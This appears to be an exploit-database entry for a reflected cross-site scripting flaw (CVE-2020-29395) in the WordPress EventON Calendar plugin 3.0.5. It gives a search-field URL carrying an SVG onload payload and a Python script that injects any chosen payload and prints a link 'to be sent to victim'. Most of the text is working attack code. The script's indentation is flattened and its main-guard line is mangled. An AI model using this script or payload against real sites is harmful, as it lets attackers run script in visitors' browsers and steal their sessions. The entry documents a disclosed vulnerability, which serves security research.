# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
"""
~ VULNERABLITY DETAILS ~
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
#
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected
into the search field.
#
The following python code will inject javascript code and print out url that will be sent to victim.
If you use unicode caracters for xss , exploit will print page source.
##USAGE##
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
##OUTPUT##
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
"""
import requests
import sys
import argparse
from colorama import Fore
def vuln_reflected(url, payload):
s = requests.Session()
get_request = s.get(url+payload)
if get_request.status_code == 500:
print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
else:
content_result = str(get_request.content)
search_find = content_result.find(payload)
if search_find != -1:
print(Fore.GREEN+"[+] "+str(url)+str(payload))
else:
print(content_result)
def main():
desc = "Wordpress EventON Calendar Plugin XSS"
parser = argparse.ArgumentParser(description=desc)
exp_option = parser.add_argument_group('')
parser.add_argument("--exploit", help ="", action='store_true')
parser.add_argument("--url",help="", type=str, required=False)
parser.add_argument("--payload",help="",type=str,required=False)
args = parser.parse_args()
if args.exploit:
if args.url:
if args.payload:
url = args.url
payload = args.payload
vuln_reflected(url, payload)
if name == 'main':
main()
